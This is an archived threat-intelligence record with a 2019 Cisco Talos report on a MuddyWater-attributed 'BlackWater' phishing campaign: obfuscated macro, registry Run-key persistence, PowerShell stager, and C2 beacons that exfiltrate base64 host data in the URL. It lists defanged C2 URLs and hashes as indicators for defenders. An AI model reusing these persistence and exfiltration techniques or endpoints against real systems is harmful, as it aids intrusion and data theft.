{
	"id": "a953f9a0-2c8e-4695-b2d0-81f7c9fbe21d",
	"created_at": "2026-04-06T00:10:38.077569Z",
	"updated_at": "2026-04-10T03:34:22.753365Z",
	"deleted_at": null,
	"sha1_hash": "f25a7e7aa5d804e1e37ddf35bee341acd0461823",
	"title": "Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 196234,
	"plain_text": "Recent MuddyWater-associated BlackWater campaign shows signs of\r\nnew anti-detection techniques\r\nBy Cisco Talos\r\nPublished: 2019-05-20 · Archived: 2026-04-02 11:43:52 UTC\r\nMonday, May 20, 2019 11:00\r\nBy Danny Adamitis, David Maynor, and Kendall McKay.\r\nCisco Talos assesses with moderate confidence that a campaign we recently discovered called \"BlackWater\" is associated\r\nwith suspected persistent threat actor MuddyWater. Newly associated samples from April 2019 indicate attackers have added\r\nthree distinct steps to their operations, allowing them to bypass certain security controls and suggesting that MuddyWater's\r\ntactics, techniques and procedures (TTPs) have evolved to evade detection. If successful, this campaign would install a\r\nPowerShell-based backdoor onto the victim's machine, giving the threat actors remote access. While this activity indicates\r\nthe threat actor is taking steps to improve its operational security and avoid endpoint detection, the underlying code remains\r\nunchanged. The findings outlined in this blog should help threat hunting teams identify MuddyWater's latest TTPs.\r\nIn this latest activity, the threat actor first added an obfuscated Visual Basic for Applications (VBA) script to establish\r\npersistence as a registry key. Next, the script triggered a PowerShell stager, likely in an attempt to masquerade as a red-teaming tool rather than an advanced actor. The stager would then communicate with one actor-controlled server to obtain a\r\ncomponent of the FruityC2 agent script, an open-source framework on GitHub, to further enumerate the host machine. This\r\ncould allow the threat actor to monitor web logs and determine whether someone uninvolved in the campaign made a\r\nrequest to their server in an attempt to investigate the activity. Once the enumeration commands would run, the agent would\r\ncommunicate with a different C2 and send back the data in the URL field. This would make host-based detection more\r\ndifficult, as an easily identifiable \"errors.txt\" file would not be generated. The threat actors also took additional steps to\r\nreplace some variable strings in the more recent samples, likely in an attempt to avoid signature-based detection from Yara\r\nrules.\r\nThis activity shows an increased level of sophistication from related samples observed months prior. Between February and\r\nMarch 2019, probable MuddyWater-associated samples indicated that the threat actors established persistence on the\r\ncompromised host, used PowerShell commands to enumerate the victim's machine and contained the IP address of the\r\nactor's command and control (C2). All of these components were included in the trojanized attachment, and therefore a\r\nsecurity researcher could uncover the attackers' TTPs simply by obtaining a copy of the document. By contrast, the activity\r\nfrom April would require a multi-step investigative approach.\r\nBlackWater document\r\nTalos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat\r\nactor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target\r\nentities in the Middle East. We assess with moderate confidence that these documents were sent to victims via phishing\r\nemails. One such trojanized document was created on April 23, 2019. The original document was titled \"company\r\ninformation list.doc\".\r\nOnce the document was opened, it prompted the user to enable the macro titled \"BlackWater.bas\". The threat actor\r\npassword-protected the macro, making it inaccessible if a user attempted to view the macro in Visual Basic, likely as an anti-https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html\r\nPage 1 of 3\n\nreversing technique. The \"Blackwater.bas\" macro was obfuscated using a substitution cipher whereby the characters are\r\nreplaced with their corresponding integer.\r\nThe macro contains a PowerShell script to persist in the \"Run\" registry key,\r\n\"KCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemTextEncoding\". The script then called the file\r\n\"\\ProgramData\\SysTextEnc.ini\" every 300 seconds. The clear text version of the SysTextEnc.ini appears to be a lightweight\r\nstager.\r\nThe stager then reached out to the actor-controlled C2 server located at hxxp://38[.]132[.]99[.]167/crf.txt. The clear text\r\nversion of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when\r\nthey targeted Kurdish political groups and organizations in Turkey. The screenshot below shows the first few lines of the\r\nPowerShell trojan. The actors have made some small changes, such as altering the variable names to avoid Yara detection\r\nand sending the results of the commands to the C2 in the URL instead of writing them to file. However, despite these\r\nchanges, the functionality remains almost unchanged. Notably, a number of the PowerShell commands used to enumerate\r\nthe host appear to be derived from a GitHub projected called FruityC2.\r\nThis series of commands first sent a server hello message to the C2, followed by a subsequent hello message every 300\r\nseconds. An example of this beacon is \"hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater\". Notably, the\r\ntrojanized document's macro was also called \"BlackWater,\" and the value \"BlackWater\" was hard coded into the PowerShell\r\nscript.\r\nNext, the script would enumerate the victim's machine. Most of the PowerShell commands would call Windows\r\nManagement Instrumentation (WMI) and then query the following information:\r\nOperating system's name (i.e., the name of the machine)\r\nOperating system's OS architecture\r\nOperating system's caption\r\nComputer system's domain\r\nComputer system's username\r\nComputer's public IP address\r\nThe only command that did not call WMI was for the\r\n\"System.Security.Cryptography.MD5CryptoServiceProvider.ComputerHash\", or the command to obtain the security\r\nsystem's MD5 hash. This was likely pulled to uniquely identify the workstation in case multiple workstations were\r\ncompromised within the same network. Once the host-based enumeration information was obtained, it was base64-encoded\r\nand then appended to the URL post request to a C2, whereas in previous versions this information was written to a text file.\r\nA copy of the encoded command is shown below:\r\nhxxp://82[.]102[.]8[.]101/bcerrxy.php?\r\nriHl=RkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYqMTk5NypFUDEq0D0uTWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwqMzItYml0\r\nOnce decoded, the output of the above command became clear:\r\nhxxp://82[.]102[.]8[.]101/bcerrxy.php?riHi=FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF*1997*EP1*Ð=.Microsoft Windows 7 Professional*32-bit*USER-PC*WORKGROUPÐ=.*USER-PC\\admin*192.168.000.01\r\nConclusion\r\nIn addition to the new anti-detection steps outlined in this report, the MuddyWater actors have made small modifications to\r\navoid common host-based signatures and replaced variable names to avoid Yara signatures. These changes were superficial,\r\nas their underlying code base and implant functionality remained largely unchanged. However, while these changes were\r\nminimal, they were significant enough to avoid some detection mechanisms. Despite last month's report on aspects of the\r\nMuddyWater campaign, the group is undeterred and continues to perform operations. Based on these observations, as well\r\nas MuddyWater's history of targeting Turkey-based entities, we assess with moderate confidence that this campaign is\r\nassociated with the MuddyWater threat actor group.\r\nIndicators of compromise\r\nHashes\r\n0f3cabc7f1e69d4a09856cc0135f7945850c1eb6aeecd010f788b3b8b4d91cad\r\n9d998502c3999c4715c880882efa409c39dd6f7e4d8725c2763a30fbb55414b7\r\n0d3e0c26f7f53dff444a37758b414720286f92da55e33ca0e69edc3c7f040ce2\r\nA3bb6b3872dd7f0812231a480881d4d818d2dea7d2c8baed858b20cb318da981\r\n6f882cc0cddd03bc123c8544c4b1c8b9267f4143936964a128aa63762e582aad\r\nBef9051bb6e85d94c4cfc4e03359b31584be027e87758483e3b1e65d389483e6\r\n4dd641df0f47cb7655032113343d53c0e7180d42e3549d08eb7cb83296b22f60\r\n576d1d98d8669df624219d28abcbb2be0080272fa57bf7a637e2a9a669e37acf\r\n062a8728e7fcf2ff453efc56da60631c738d9cd6853d8701818f18a4e77f8717\r\nhttps://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html\r\nPage 2 of 3\n\nURLs\r\nhxxp://38[.]132[.]99[.]167/crf.txt\r\nhxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater\r\nhxxp://82[.]102[.]8[.]101/bcerrxy.php?\r\nhxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/helloServer.php\r\nhxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/getCommand.php\r\nhxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/\r\nhxxp://136[.]243[.]87[.]112:3000/KLs6yUG5Df\r\nhxxp://136[.]243[.]87[.]112:3000/ll5JH6f4Bh\r\nhxxp://136[.]243[.]87[.]112:3000/Y3zP6ns7kG\r\nCoverage\r\nDoc.Dropper.Pwshell::malicious.tht.talos\r\nSource: https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html\r\nhttps://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html"
	],
	"report_names": [
		"recent-muddywater-associated-blackwater.html"
	],
	"threat_actors": [
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434238,
	"ts_updated_at": 1775792062,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f25a7e7aa5d804e1e37ddf35bee341acd0461823.pdf",
		"text": "https://archive.orkl.eu/f25a7e7aa5d804e1e37ddf35bee341acd0461823.txt",
		"img": "https://archive.orkl.eu/f25a7e7aa5d804e1e37ddf35bee341acd0461823.jpg"
	}
}